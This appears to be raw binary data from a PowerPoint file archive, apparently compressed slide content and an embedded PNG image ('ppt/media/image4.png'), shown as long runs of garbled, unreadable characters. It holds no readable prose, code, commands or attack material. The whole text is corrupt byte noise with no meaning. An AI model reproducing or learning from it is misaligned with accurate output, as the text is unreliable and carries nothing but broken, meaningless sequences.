....].-\.J\.[c..`zYg.K..0.E...[...R.B.....9z.....['...*....l.1...[tkH..6"......q...<.@..M.....<.$E.....J.I...y..3....    ]s.j.Y...:%.i.)L.S4...K,?.I[O..'k.HZ..DD.5$..z#...aS.w/....p..5M.8..Q7...P.z.V.R.OC...YC....%d..IZ.IY .....x........7...kN=...7.f(.i/#-f........DJ"2<.2.{..np...%V.G.g8.A.R@..YU.i.Yf.Z..\...$..DJ.]e%$.R|&....i.u......R.Kv.._q    2+.m-..........T)..-.....m....I..8.K.G`0..BXX.>&)X(*.eBNe.    .]&.."f....C...).P..I*23l..f.,.=...Ot|a..1c/.1-.+V.M..S....`..=..2cX...CNdd|G...&.3X.fr...!..K.D2.-.!DF.%E......p.....n..0eL._.ZSl\t...:.....6...E.pq..2...KKKiK....Z    :.234.S.~..I~lf.{-k1)..    WJ.2Ll.e....[...
....mC-.....]L.W ....7.....f1...
..bP..#.....\..:....FFF..2<...w=..p;.&..oE<....7~CM&`.D.e.......k&.z.3,.g.C.Z>....5.8.v....4..*..G..s.......).S.bY..V.rq..&Kl.kAkf..;.W..X`;D&...V.t.W;....RSqm.......!R.....e......_p.......X......hH{.K....7.qa..!.N4.h\b...#JT}..$..8.1...f3..B.o.4}p.....-?8C.B.g.8..%.fe./-S?Lx.r.E.J..m.F#`)i...b..C]k.......2'#...&...m.v8.o.J.......+=..*.....E.....l.@.g..R.(yk..!.\.(.
..i.4.$.s56....h.U..............S..,<[.I..x......6u%    ,.T.t.r..Q.dFb.i...~0.,..6.$..5yp...p.aX..pRH)L.......1......MiJT.l.E.}    ..,...Q...O#*.:.TM.....s.0.e.......k..L.z...3.>.v.a.K..]..N...T.uN........(......u,.dJ"\&R.e.k"34/b=P..q.. mF.j.Q.m....&.})..i..L.*(%.)...a.-...^C[
..\..T..=OC..k......5..%o.....BRrY.......6......)|........i=l..5..8..UX.. ....ya....v....+...h.'".=.$.C7.M.J..JJ.$.%$.n..^kJ>........I.JI.+.Q|F|`"L).n...\=V8...~....>..J..j....=..6.\.%D.E.n#%)i,..T.\............ ...L..<U9    .QMu!..!...!.Y'dK....g..H..4...p...W..]..I.../..5..i..}.6...[....mP.uN...^3$.....u....z.0.o.EM..V0d.j2_PIJ.2"...mC.....m.BIFDkl....(...:i..N.*....|PQU...N..]M.[.u...6R$.n..I......>..a.U.Z.}f.....-........b.:...........k!.....i%.....!.........................................p..350.3.....)22i$e.d.....e..2.q......%G.&.....4T...8.+o'T....Q.p.......8X.........45#. ..GC....a.&....I.W=R.#>."....,..6.>...    .vV.Z..%.e.|.bB."<.2.n..j.=mR.,..aL....&..}m...6Z.I.d.W............g.yq.qP0......m.W..8.)*......P...Yg.Y..d1..A....+H..7..l.]g....O..Lf..j$.4.....V<x....o[..~..f.YZ..K.AM(..........K.=.'UY.ME.....,.....;4d..
.\;.;..=...Zt.......n"=L6.0.l..C- ...Y.m.z.JSg....x2..j.0A.....P.m2.8kRYl.F.<.FD\&}..".[....    $......C.$.$.    ...e....m6IJxs.".!..i..mmR...))W..G....i..V.$.>3.a...E...P.8.....l.m.,.I....!..i...4..........Y....5..%)Ij.$E.".%..e.
..R1..>..".6.m%N...SjR\G.....,.8. ..x..tx`....)[G...kn.sI.#M;.Q...(...L..4.zd\<"t&.JI(A.E.e..w......

n.........d.R...d\f}.1.Q%..$F||.cP....V...j.......PD..Y.g.y.t!..pkq.XV.S..yM.I7..........4JR..)"/.CG.K.6..22.....n..`.a%.....m.[,.i..R.......JRY%$E.".../@....b..S....T.5 ..dG.Y.Y.2.    BrJH.....b....A7....K%.8.2%....~..q.C&.O-d.....CP.....4.....j'<.K2,.....
.A.1...4o..B.4..R|&.VY.}....2=R....!.......$...".......M.0..K%.\A(...#..22....@....I..3.a..Pn..,#M-.5.Sm.M.e.....?.c8..cFFZ.....1D@BE8......W....3mYe.s.....f..v6....<..1.2
.=..F...N''.u.....G.c0...C4..i(m    "B.Y.H.""..b`.b...a.p.^.F.    Z."2%.|G..    wFP...l.DCQq..8..f..l.M.Y...
s..2K".j.0?-..y...F.q...qm...2..&e..3.KWT.2?H...C,.".. .vM...[+....d.u....3..0..)JK$....C........{h..2...../.'...)-.B<.C.(.d.%$..##,...`...O).H%0.9D*X...C..#=V.BI)Ig..........H.......i2.q4.....e....>....U:....w!...................................7..}...tA...7......tA...;h..l..:|..e..B..>a...:..w..r..||.f;.p.......Q.....?.o.8..A...;h..l..:|..e..B..>`.<u........}........C..D.J...?.o.8..A...;h..l..:|..e..B..>`.<u........}.........Hs....o...y}<h.t....?hK..Y..t..s...B|..`.<u.......}..$0.........C|..2.x.....G.~..=i..2<....Za>..0r.:..w....x..7.a...........|..G.{)..G.~..=i..2<....Za>..0r.:..w....x..7.a...........|...G........,.........=i..2<..x...3.?U..0<Ha...........C..?.....>.|g.|...O.#...,.......!...|.X.W.....!.......L.J...>.q........?s....|..`..g.0..G.9....r..._f..0......S.....>xq........?s....|..`..g.0..G.9....r..._f..0......S.....>.............z.    .dy.s....|..`.<u.......}..$0.........@.!.......L.J>3.>Y.L'.....z.    .dy......g,~...`X......G......|..G.{)..G.~..=i..2<....Za>..0r.:..w....x..7.a...........|..G.{)..G.~..=i..2<....Za>..0r.:..w....x..7.a.............8..?.0}(.......9..<"...-.....a........O.|U..).......o.7oFt..}..$0.........@.!.......L.J>-wf.....O....{...).....}....LGS..J.!....4:`.P.!...4...>.|Z...../......?..S.!..}..r........a...........|..G..)..G....{...).....c.^%?.......g)1.O..+|..3.x.....@.!.......L.J>-wf.....O....{...)...m....9I..|_iE..>p>4:`.P,Ha...........]...?..S.!.0....Jd9.o..|.Rb:...QbC...h./e0}(o.....?..L.J>-wf.....O....{...)...m....9I..|_i[.0......S.....>xq.........v`=..x...n..../....F....3........C..}.h.t...x......G..........~....Cv`=..x...r6._.....u>/.....8..?.0}(.$0.........G....{...).....c.^%?.......g)1.O..+|..<8..~.`.P.!...4...>.|Z...../......?..S.!..}..r........a...........|..G..)..G....{...).....c.^%?.......g)1.O..(.!.......L.J...>p>4:`.Q.k.0....Jd7f.....O..#m.....LGS..J,Ha............>e.........]...?..S.!.0....Jd9.o..|.Rb:...V..>xq........C...h./e0}(.....c.^%?.....~....C.....w..&#..}.o.....?..L.J...>xq.........v`=..x...n..../....F....3.......x......G........8..?.0}(.....c.^%?.....~....C.....w..&#..}..$0.........C|..3.x.....G....{...).....c.^%?.......g)1.O..+|..<8..~.`.P.!...4...>.|Z...../......?..S.!..}..r........a...........}...G..........~....Cv`s...x........w..&#..}..$0.........@.!.......L.J>1%..2ao.M..U..&.'.{...|...O.#..G.).._.....uV...<.......8?..?.0}(o.....?..L.J>3.>Y.L'.....z.    .dy.y........x..7.a...........|..G.{)..G.~..=i..2<....Za>..0r.:..w....x..7.a.............8..?.0}(....g.0..G.7>Y.L'....C._..........C..?.....>....|..|h.t....?s....|..`..g.0..G.9....r...|.f..0......L.J..0......S.......z.    .dy.s....|..`.<u.......}.o.....?..L.J..0......S.......z.    .dy.s....|..`.<u.......}..$0......S...bC........>.|g.|...O.#...,.......!...|.X.W....!.......L.J...>p>4:`.Q.....Za>..0n|...O.#.......9c.^/...|...G......|..G.{)..G.~..=i..2<....Za>..0r.:..w....x..7.a...........|..G.{)..G.~..=i..2<....Za>..0r.:..w....x..7.a./.....>....|..|h.t....?s....|..`..g.0..G.9....r..._f...>p..>4:`.P<Ha..............z.    .dy.s....|..`.<u........}..$0......S.....>xq........?s....|..`..g.0..G.9....r..._f..0......S.....>xq........?s....|..`..g.0..G.9....r..._f..0......L.J..0......L.J>3.>Y.L'.....z.    .dy......g,~............................................\G........7....?.c..[..--..S......w|<X*...b]e..D.3..Q..57..+O..9....FD....Dyg..y........K*8j...CM...L.fo;...3'.RR...di3,.D...2...4.3...?..B.....de...XK#Y.>..,u.~Z..O...3sX..e.....7L..j...Y.~...p..q-....(.eSZRw:..A..S".a.(D.o.:Y%l...m.J.Z.Y)&d)7m.z.<....X.\.....`...5-DDE...D%i........8..=*...xWd.\.r.h..D..!XV.v(w.B.6.y.-[#|.kI.j.E.*T.*.d"...{".S...j..D..2..af...)...mf..q
"4-*I..|$dd;....=..g7..Id.... `....J..f&1N&..&...../+$..P.....k5.M:S<.S39:...?..OO#d/.....-.u.@...:hY.......Y.E.dd~.........s.~..U......?-.S.z.kF>.M..Q.c4....%JQk..E.)U.(.J..
i.......d.m.(x.l...LO...A'.;4TB.....K.R.m.....z.F~..c.&*..I...dfy...[.&.B....R.......3....<..43.......q!.EL`%.4..cv..&.2.ke...i.Zu...CHB.G.z....-Fs.F...U^.{.$\. .^..=..Vzo#v..K..J.&....sb..B..K.<..R.F.kp.....h.E.....J....`...........e.........`.?..3MDLL.+...U..#SP.m..lz.!4......T.1.;T.......JME.8HO..Vy$.3<."..[...D_.ss...U%S.*~V.'..2L....'.$j.n!...]..Z.p.J.QD.3.....T.p.........S5...-....[*~.f..4(.jA..i<.#..!.....xp^).e&*]5qS&....wL...5.j...f..z..Y..+5.NY....QT..lt0..{.p.\WV2..$.g%D....BT...8.;....M..f...],..N.z..Y...#:.%).j...8.#.....k0.Z........J............Q..Cp.[H.=...ZoT.sp.,.2U]4S.S....+M3T....H.r2..p.nN.n.....J.g#....DMi(.L..Zz.QK.=....q/..kl...A.\%.k.....E5U.....v.[....s.g>.K#c..7.#.$...
..Q..m."'    +#N.p...9.1.....]..."....*i.N.%...6...$.]t..Y6......I.M.).Jg.q..5h..I......#/LH...W.p.B,...w4.......c    3(....u.F...R    D.6.75H....V...N.S.)M5U9B:2..f....Alg.R...5.O..C.@D..#\TJ..M..~..6....]S.,.>..
.QV.bch...9.[..?U......)...o....m.W.<_.*..}....................................vJr.]......F...I..KL.{..D?..iA-D..A..$(.d.,.....*..c._T.5NP.`.Y.@*....................................~i.......`vy.......`b..i\.......z.....;Q....\..MN.d..=0.O.68v..ql6..3^....R#..."#2..5{.[.W.1.i.j.P
...icp.D......34...2'=4%....J4.i3/p.J.<..Y.....3.....u..:..8.....c..Or.Ec+.S..i.2..'...<4;Z..(...."JH...v.B.._z..NS..yNRS.cR.....k........RK....f.........h....aJ...&d}.0.VY...E..Zk.E.../......kC.fH..K...(f.6.C.....4.....'.G..Z.`Nm.)1.4...{...R....).sX.ngI./bTd".R[$B.q.....^F.....5k3....g..w,E........_4].i..R.7..).V/.V#....0..c.5...........W.dRR./.u+...m.%....-A;...Z..K.+.gtM%/.@%Kq..5d...Q...-1.....J!.g...."....H*......h.).T\..w.D...}V{..<...<o.0....)n....j"Q..Y..l...Y..4aWT5.....W.......|....q..1..C<.....f...$Fg.. S<..R.y......vb..jgld.74n.q..6.T.."Ql>._Z.W....FZ.Yp)'.G....ffy.....>'.R~
k.Wk.um.-..q.>KZ.E..e.Z..K...RDf.o2t....>.3..j+    ...W.{y...b.-.L.e$f......."..B.4.KR.."b...D2M..`..2Q.b.....(^...%........b..Uv..U.Le11.v._.z.).c.J...5...n.....V..x..JRo...d.HCL.T...%.uHI....4..qQ......"..-..L,.T.9...L.......l...o.\"...%..%a9.(.C.&..W.RC...5I......xe.!E..vV.iejJ..M#.jjQ....f..L.G?..l}[.6.b:[_B]i..yk.I#?K22....{Mp.[j1."...i.51E...E.v9..2K.......G.......m...5'%......}.....\U.<g..b....=.....#...4..-.I.f.e.....,.98.*..Y...'.V*....E;4...%r..*..;r."....j%.v.Yp..5%..T...f+v.\...,.'.Z...3...V...#UFSP5\.v........!b...Q.....J3I+"%j.......>......Nn.1'.......d...C.0j_.0r-H..H.....2...9..
.ffy..cRZ..#2.......fzbs.R....s..)    FN..B.......DE...xf.q...;...Fd..sI+2#<..N.......#......&5]....P.8.i..[s.....r<...uY..fD..Q...f|&y..5%)$dF|!r....S.{......(.y..G..Z[...L..E..rz.u}.............
.2]....[pS2.../.    ..U..(../Y..1..9....'.R...30.......}n....u..N(.MF~...g.3.w    W....E..p.T.Y3.V..UR..^i.t.(T...m.%...D.-D..2y...2.....#.Z........1z.    .Qrm...]..t...........U....%4.A*.7Z....8e..$..4hJ.dFJJ.#!.....QT.wZ..b_JTR.$.E/....G9....!'.dY..CKY.d].Y...qY.J<....#"3,..f....g=...Y.............uAva....%AQ...iid...T&..qS."Gk...ZS..DH.VN..\R.W....^..,...3Ll......9.........w...C..e/.#...............@...8..............................--...$.    n[..=.........S9.-W.8.....!ZC..[n....=.HC-.O.rA.Z....4.Y.....X.E.L.YNk.{...r.8i..D.,....0.t.B......................................?4.....Q...1o.....Oh...<.................................................b;...!....^..x..T...c...................................?..PK..
.......!..RG.i...i.......ppt/media/image4.png.PNG
.
...IHDR...v.........aq.x.. .IDATx...yt..u/.....v.6b....)R....DI.D[v..Nd[.,.~vb.e}...s>.s.......$.,K..X.%.ZH.."..H.+...    ...}.}..?z....{V,.=....u.n.......n.2....PJ.......@)@...R
..Qj...
...CtP........#..S(.
t..y....eauu..Y..
?._H.$.0...    ..-t..Pm^.0....~..&......eM...u...?O..".F.%N?E......s!_.}...y.{.....I..3u.l..._@A(.....x..v_.\...D....zG-~\.z|u...d.....+..k.}j..._....w...Y...F:.I.....V...r.Dgt...,.6.(...D. K%?I.s....s...H..d..A...d...:.....1..`3.....K.....\.k.....?Q.0..e.u.f.=....%+t....um.
.NB....1v..{.r`.).Y.]..o..b.=...~..T.{./.OQ...w.=..D......p.....X...[r2.|x.lN...DY+.,........O.*.j]9.US#?R-].^T.L)'..S...tg...R..Z.p.C....v........7......*.B.1....v. ..    ..Q'    TR.U#.o...h.M.r.:.....P..[...+U..2..M.:.P.r.......]_5!.6Y...Q.A['=...W$.(..t..[.~.=J#.....C,Gx9....^I.u....k>QW.P.....{.~.W..tY...uV......w%.)AU..U.%..W$|    .1....z~    EP..7..C_X.<.'?.<..U..r.9.D...H-pW:..h.....;QZQ"9.0.@...A..^>...J..tN.}..NZ.|.I....
..`.....ih`q..U.+.    .%?a.+..c.    ..O(.P... .=..W
.P......|@2:...].0...T.....d.^......~[lH.].r..x...,...X....>Y...}.}R....p.B.B.H.....(..Z{e.r....S.G...O..D
....#.u.|.Sh.
...........p.aI.:...(G....*u"uN.l.-.....$.\...Qg...p.]..R.....$.}..3.p...9..l$'?...e7..,.UT=.#.'.N..j\.    a:q:G....
...h.......N.....#Z.../........s...i...k).....s.........J...z.I.(W].AslP>$k.S..e..14    *..G.Z6P.!..&.uH...2..~.=.YT.U.Y3A..S~...=...O.d\X=J...j...(2.\,.l.=.......{8?.....Z.0^.......*z......".!../..}...'..d......Z.z!H..c...~O.......*V...`<...S.......C..u..C.o}..,/!+.Qt.u..I......6J=-] ....u...c..%....^N.cw.WR~.g....O.U8TqC..j......'z.,...:....S~.....R{....s....^v..*............y...'.    .t.m......+.R{..O.....`1.........1..-#Y*4..dS.    |. ......B.u..2........J...{XPU..>.}..
..BttN.}..n.....ZIU....#(.... .)...`....a....Z..x.@0..2. ...`0[@.F.B...K.e.`..&>+V.U....B...l6/.b)HA
R............t..c.#.]N).{..F.U...[....X...-F
.....K~!.Y.Pn.r.e......N^.5........EEE.....!n<|.....W...>....m.zsm........Zch.d[(.o9.....8W....=&.
n..wuu....:Y.x....8@...+~..}.......nE.......F..^dw.......(cOC.:..[..(....Q.-D.o&9....[..x...J.r.v...-.f.`.5?QwB..z..[.&.........O.^..G.....o..eL.=....'T...A.~...r7...p...MH..<0#h...F)e..&4...m\..D.X Y..x.o.E....o.m1............|......D_.Xl..'...,...~.H..........9..........!|..GCAT...h(....$r....p..    d.ql).x.%......0]........Ru.C...Jn%......&j.....$.-A9:..8...
.C....\R..{b~..m.o....I...{..N#..z..=.*.Jn..Zx"G=..D&.....$?..h....._..'...sm.h......_.1+B........c..\4.R.M^Jm%.."..J
.W.....B.:.J..`..B....Uzi...Q0%.S....q......I....tW.RA^1.P8.. .3..hH....(.Lw%.a..........(?x..t..=v2..Y..(&{*9U.d..)..=..R....+Es}.uN..%{4........c.=Q....H.._>."k,x../&}.../.G.k4.-.w(........:b....zJ9..&.e.).gX4.;
..S....e.gY..)........W....%..r..-.D.p$..R.2....P..Td...,....N .....d5...X.....'...=.T.\%...Q...N...../.R1i!...[b..,........g.....{.T..'x,..W..y.W..p.._'R...cI...xu..". .zb......]K.Du....c.=Q..:..m.%K<./..../D....d.....A.~.)....s.....S........`HBt"#...MJ.....%....q.Y(..e.Z.0..L..|...[....X..y...".J.'..
..L.+N......9.aEQb...B.j..HB..Yb..?.o..V%.r...c...>.i.|\...w@j.],.,O..<.....v..7...k..%zZc%.....~.. .6.k5..b..Xp[.."].O...Gh g..Z...q|YL.....    C.2U....>7.Z......~.39.o....I...{..\Y..:.ZO..t..z.'w<:.....|2.....k..xe.a.m...|.}....m.....w.<.
[...>`.J....5\AW.M..Y.....Dk....'...m.hmi......fS.sB....>.....6V.^..e+..PR....k....}HKO..!............t{&...DI..P....D...X.r.... .....&.2......s.O.......BvvvHF....H.9G.....tq..Zw.V..5uj.t)..R. ...K......d2.QX..5.......Eq.
..9...|wW.QI..'\...C...0...sr.6.....Es.U.45..r)............099.B.HOOG..rT/].k.-..0...B...4..;;.z.....&.D.1....2.....wm...Lp..0...1~\...(.m-..!.M(2?....I...j...l./]K.X..D.s.C..Xd.:................S.P.m0.a6.`6.`2Xa6..d..@.    .N.}.......I..o..oE..r~...n=}9T ..._.!...>...|.9.\k...<.....R....A
H.^+eM....o..2...[jG....,Bj'..@ ..+.._.@.....z..    .....e.....1...Cx..O.....y....@zz.......
.......Oc..Z.....`vv..=.S..e+.....z..\o...>....?Kr.d6.....4.......\&..r.0TY..!..Y....?..l(A0....?.....v.Fx<....a.........l....6v.    K.oP... ......F..^../<.S.Z...../}.A...}dx..x.?.a.D~A.<........arb...V..rbxp..>.(...i.M.PB...)..Rw..AJ16:.....^...99*....e`.?...
..&.......}.z....8..x\o..3.>....W..-.HT.X .b..M.....C. ...CZ..i.....;{0........!8}...gC.....S.....m.F.    f.&..Pbg6..f....@NZ).m....!.V......A.Sk........}.q=..7.V.;..t.......Bb..........{{.l.J47^..@.*......M...gf..........n...a.....w.F..c.#..".........azj.6[.>v..homA......X.q3jjW.....s`...P............BP.w..!.,V+>~....}7..\.O...E.....).<K1....g?.....KJq......c.....N.&...|.....E...X.8..1t...n....v..t    :;.....`0...i.].    =].0[,...@..../p.....gf.....b.*......B.y.AN<.zYY...7.............../}...d..kW...........S'..j.....5.Vc....>y....(YR.-[.#3+..-M.Xw....u.nTT-Ec.e.................8..I...$.&'QS..U.....~?..;..-MHO....;......}...}.]...U.J.....k........w..-..z...m@Qq).}t.=].......|.......a6[.....r.bIY.2..a4....q.....}.`0...k.i.].............Jl...Y99..P...z.|^.XY...6.d2....|+.(.>'....G".M.T'..+'47
.q.3..m.&.%..t4\..D.X Y..j.h.=.....%*.|.N/...+..z|].I.N^...3........}...\R..t..p#...".O!.......6.?.Z....(............4u........[.........|..V_....'a.Z..........m7.....=]x...aY.J.....w......!<......&...@G{+...........[o....+k....+x..g`.X...q..i|..o`.......*..b...x..g..p..kV...&\..J.&9.|>.ff.......0.*.].7~../0.....b.}.!.F.F.....199....x.^..S..8x..?r...bLN.........[tu..+/....B.8.....W^x...n.........z.,...[o '7.......rh..x.QUV......j.RJ.v.09>...1....u.......(....K.....O...q..Q..v......"....8}..*.....u......w...._dfe.....|..w..M.W...........q.........(.. ..&.r.|D. .8v. ~...B....S..|....._bb|.........:*..-........s.N|..q.lo....q...XQ.../..fgg`.g...~...k.(,..o..5.k`6[p..Y..s....g~.. ...{&...FZz:......o`..U.r.<&...{.^.....z..>/......".WV.....4p/4f'..K'.k..&..*.. ......d..q..6Y.b...5...?..o...a.M^E..G......6...pS......~..2..........70...G..4...b.8P.{..s7.*.N.d,E.%.6s......b.q..H..|.",4...;.\%........%.....Dc.e...Evv6JK.p..{.|.6..A........b.j..w....~.hi.......?...<........#..[.f...W...\....`......>.>.~..?...'Q\R
...`0....hij..O...>..........2..P0..v.../_.;..5Lf3v~...q.6.L`..../|    .#..hoE............G.a.......B......`..w............%.>:.....q..9.b..h..?.$.o......=..?.Y.......;.|.6.......?G..6..s.....a|l.?.._.`0..f..=.5..~.;}.99..g......{.........P............|.u..m....7.y..>..ugN..r..OI........S...f<..oalt....~...Q<..'.._.....>.^...6:<.3.>@.......?q..y<.....ug.....+......v.F....q.n.#...f.utwv`..Z...G.............`0....(+.... ....p..    >...R\.x..SSx...5.7...y..~\<....p........Xw..UK.t.........{.x...eake.E....;..c.'{..v....A.Ni.N..F....iE..Et._B..U....,....-t..8T'....z!\l/...@.=%.)..]h.....i.0....!F8..Q.w'.r6......e.M/..`J.B.v...79.SSS........f~.........X..v#.. ==....A.\.X.V..l.....b.h....a2..-^?.._.4@....*......R........sv.}.........z{...i...X. ...f....x...Y._.3.0......|X,V..~.\Ndfe1..33.q...*+.>..4..6.....t..!...?    e.Zq...a..w"....%e..ll.....&..[.A..v....4......x<n.|>......32`....u".nGff6.3.o....`.X`..`6[..a..j......!.s:G{.d................8
.r:...088........u..@.]......`...E..@z....deg..v!..bff
.O.GF....m@Nn...F.............@ ..6..U.c..x..y.$.. ........"..~...K*..../(Dg.Mt.l..w. ..b........]....g....ep8.p....r..0...X.0.L./(...D0.Dw.M.y..(.........}.3.t..N...........b.....c...&4-\..-.HT.X .b..M.....C. $C .G.d=Z...g.
Ffnbd..................].....|...r..E^.v..P.14s...-...*.l.p...4{...Du.vdX......S:w{..^/N.<....|.._.....$.\.....O...qpp....X.~=+w........+.p8......t.....

.y.f...A.J)N.>.....6.Ms.Yh?...{..''.|....%...G`.X1>>..o....G.z...{...
2...iO...'a1.........5...........G.}.gO....G_O7.m..<...QT....gO.B.=.M...z=!.B.v....*...Ic.K...A\.t.......m@G{k(..|......    V??......_.C....v.
.n..._...~...v.S..._...)......cg.X.v...E...j..j.rtu.c..=....sv.%.&.    .@~A..ssQ........u..ga..u.X.X.~.rrr.|...e.ho......W....#Ao.&....z.5'/..."4._...?...&..Lc...p..=h..............GQZV..;w....c.#....... ...ii..s...;....z......lVuQ^..3.S.Pw.cc.8~....W.....w....-M..311>...m..u;.N'....140.1V.......$.S\....G.....D..o..^....M.i........FL...HWd..fh.    ...........(...............n...........kJ......#c...".y....544...)tvvbhh....l.-....t.n..d2...czz.......b..n7.......X,..l6..."7Wy....8.^/FGGQYY    .p:..p.....P\\.../....,........q...l..Q......I..QN.h{...{....{.x..?~..f3.^/.n..b...>.p((p..O..^~...tw!/?.V.5L....]......x...A)...wa...a6[X.........g..c...!.....t.......)...K..vN.<....0.......dBYy%.?..jW....e..../<....    ~..?..j...<..e.18...{4...J    Ir.]8/.d2..-[q..
^~..X.V.{.C.gf.d1..... .IDAT......<..g...~.g....._..}.KX...[.n......h....UN.0....^.......5..g/..#..3....!~.......c........Y...C...j.:.Z..S?..bAYE%.....tI9..../=.4...."+'..~...X.(,*...5......5a....5...{q..Q|t.}..Z.5.6"+;........7dff..G?...r......k0....Z.....$.=4w{.H......%}|R%5r....0.v.=.*<............,.......OF.
.`........p..W..{.N...JT.i..... yY.....=v.v..?......I>......l.......1....lLc...~.....r..    .V+...`6..J...c.H.z.!.....W_Enn.....p8.u.V...kHOO......;v....'PVV...w............o.!.CCC..{7~...`ff..J..x..G.d.............X,.............H+....x......~.....~.RJ....Wz..i..(...lw+2s
...H{....F.s.?g.YN).!.Z..7&.[..........b.I.)T.....>...?..4..(.    .M.......).......F.....|..}..S..;.....x`4.a6.B..}@(W..*..Vq..).j...E.B...;U/..}....."--..Q...I0H.v.`KK.........`..l.Mu.~....?|^...4UR%/hx<./...>..F.........gfg.......~.9z.n...f......93.t...t
...j...w..8...sV.G..\,e.`h;Dj.].$$.]#...2^.....D...........u...........g$..../.q.....d.............b.x....J....pY......cg.1v.....X.),/..Kr..f.Boo/..>....y..w.

.u.V...bff....(**BAA...9...........ccc.......Q[[.{..../_.......PTT........999...?..7o...?....................?.....X.z5...p..%.\.l....s........t.]...!....*....{.@..+.`.9u.gF...b.K.h...I.....$
....$%...h.....P..C..p..I........K...l..d..    .a.e...P.&^w~....y~..|+....Oe(.    }.+=#]5..'L..B....F....^,MY...w......)#T].wB.^RM.r\...wQF..v{F\~'!n..Cn....ag..,...)>...*6R.+..=v..K.<...h...b..2=...O...............C.............d.B? O
.......K.......r?.|:...a..u8.9....p....f.
U.wa.c.z........C+.......sL..&&&088....6O..y.%%%.....fc..&&&.j.*.BPPP.VXrssa.Z111...b.B...........EAA.....v;...Tr..y..........;Q.......q!._..b..r.....XC<'.h..v
.ov.....K*.P......M....)k..C.Y.O..U1...H...\...hs..|..b3QtUV.B......U .%T..H.\.e.rb!....'..Bb...V...b{.......C.#....H....D......./Q9..v..&..8~.Gh.x...>..Nn.W/M./,...U.T.....5~.k.\.....Y'H.......v\.=
..v<....$.@.|... .<Y^.R.......{... ..jkkc    ..........5k044.....+.p8.hjj...CCC.IX....A}}=.. ...11.l....Fcc#./_.U.V..2...`...S.zzh...I..QN.h{.TT    ..,......J..|.*....\d+.<_n...{...b..$..mI%..e"...
i...t.u..JT.Bs_..V.[0..G..b..QT2...l..dP.b...p..B..
.HT....S~O..rB..>r..{..!...d..q..6Y.b..t..=.sv.r..8.......... ..~..U.....<I(.....pnj..5....._>..c'.3B.^....d|.</J....`&..x.-.....,.6*r7!..... V<.<.+...v..6l@NN.(.X.z5....t:....dBNN.V.^......g.EZZ.rrr....V...Y...F...?...{...........+.....^x.6.....U'...###.z.*..8.....{.....;v.@EE..!p8....*....;.=vD...y..U....$.b.v&...*XK<...q..o.....~7V(..Vkx...3.....XV.o..c'.6M.K.]H.>Reuj........>...#...T;8....v....0....0    @.$K..(...... .$S.....&.....28..k..p..U.O].......%F,A
.$LV...K.C..z....S*$t._.......7Y.m.....BA.f.....a..GP...6.tn...../.lb..S......+.z.@.SSS.Z.HKS.T......f..h..>...........\...5.W.s.R
gO....?^.=v.s.K..|..N.P..:9.|.j.....@...O(..Tg...1..3oGY|....J..E.8AU..\\Ut......_.}{..B\d..T69....
.]T.T.B.......6a...?K.4...{\~wMOp.O..Q.....%.R{.4.........&J..E.m>q=;..S...&.v.........OX..+..N...x.u....O.t..h.:...}....(..].q.    ...J.f..yyy.A.'....k.....'Z.k..o....8..(.Z...;.....@.....m.V...Pl&..J"...f........=v.......    .O#>...e..9..N...D[...8-~.$..#...s./..}...t..........wT5...q..HG=:.'...N..nq.%....\..`A~F5...[./...d.....y......1-#ze...n.|.wPSp.B....d.^1..$....
K..NT. ,9.w..$x...;.=T.[.#..66.=H<PJ......a.XX{.SA&.    ....`0....}..AF..1..2^..D>....'Dzu..{..:_...?..7...A.....+...;.    .xU.!..;..?...t.^...V...>^.......S....~..t.",4...;.\%.8....vu-..b...;Z]=."..EC.r...XeN.......Z].|...{....,....1..`RE.9.....;.J..%yl....$}...D..h.D ...3gp..1.?...    !............@GG..!n.....b........8{.,._.....dq:.hll.........8^.......E.e.t^.Q......?....x..................:t......C...,T^...D.
.<..2...j\.5...8!..<w"CN=.-.T..Y...pu    .....p..>.].....Cx...q...0..].q...P}G;....h..c,.......8........98V.k..x.Z0..=.~b...a$.O....".....eH.].x....bY.@.RN....0D.....D..qq j@BH..    !...Fgg'.\..z....}.[..s ....4........<....aJ133.V........`ff.333......b.^]]....`2.p...tuu....kkkCss3.V+..=...>&.....3g........Qm.eG.zZ...L..}.3..7.._.+4......>..~T'NP%+.....q...`.&...8w....;^>.v..V.-..p........j.U}.b...#...........E.._.q..}G.y...i..Z..#.....tq.QQ>....]...c...m..o.bM*..7z.>^<..d.7........).k.A...ov..ib..m.c......"X.V\.v;v....$..;......i.X...7o.......    ...@ ........HKK.}...c..axx.F........,....p8p.....y.&..%...x<...v..."++..............000...jl...n...._GYY...#.yy....+X..z'...Ez,>.k|...__....~.}1.m....r.PY..\....{."...........bp..{k..K>....h.f.......    .....(.)5.~....+.....y...X...K.}..c.h<b.[2..X....r....6....;.....^TTT....G....-[...p..|......(.\.....#//..=....9..W.b||.....<..._.....'.|.MMM8y.$V.Z...i455axx.O>.$:::p..    .Kvv6v........f....O...~..ndff.......L............N.>..._....x<......w....... .5.......R."...........;..Q.....[WvqoT.<H...j.K...-C.....#'...b...|..Lr..",4...;.\%.8n...Z6.....$9.^.h..x..../}.`.......U...P...=v...b...088................"??.iii0.L0.......m.@.Aii)n..............!TUU......U.599...r.B....^s .>88...z8.N........n0...H;..~.jc1K.C.s.N...3.q.@.....}x.    YYY......'P.p    ..q.i.g......"..R..E:t.Z|._l.....7..H...)...z!\l....%B...!5o..Z.....Q..
&\}.w...4..F... .x...8.k......H.'*....3.T.FG.....V ...........$...c.A.^.t.R~W ^.......P...o...{.(....G^^.6m..U.Va...hoo.4DNN...........|,.......PJ1>>...4..n.....tbff...t:q..Edff....d.Y.....iii.........p8.p:.p...zj.`hh.uuu.x<a..... ZZZ....uw..{.^..s....`2HO.+..$vTt.......!.....;..,c..I.Q.7.....~WXP.....>..c.y.....%K<.....A.....N.c.ttT..XkN......$FGG......J.......###ln..oxx.n.[.w0.Dooo...&......8.<...iA...........OMM.}..RLNN....>...R.|>...avv6j^ .....}".EX(.+.....=v~.....X.j.*++A).....s.XR.....q...tww....'We......g..K/azz.w.u..-[....]../...9Y...q455aff......f.}......`.........'......q|....G.}....-[..`0...m@............k.{.
_?.    ?. '.G...5..(...y...U.....6r..MXR&...Rn....R.T....E.#R...o..10...W..S.A....@.A]?.@.    .O...........q......SO=.....~.................zm.V..W....+.......>|.yyy....U.).hmm../..?..?...KY......x...........XW...jFk.h.X@.......z
^..&.    O<.....333x....v.Z........O?....6`..=.......p.}.!#C...X.....On.,..z.....C.%6
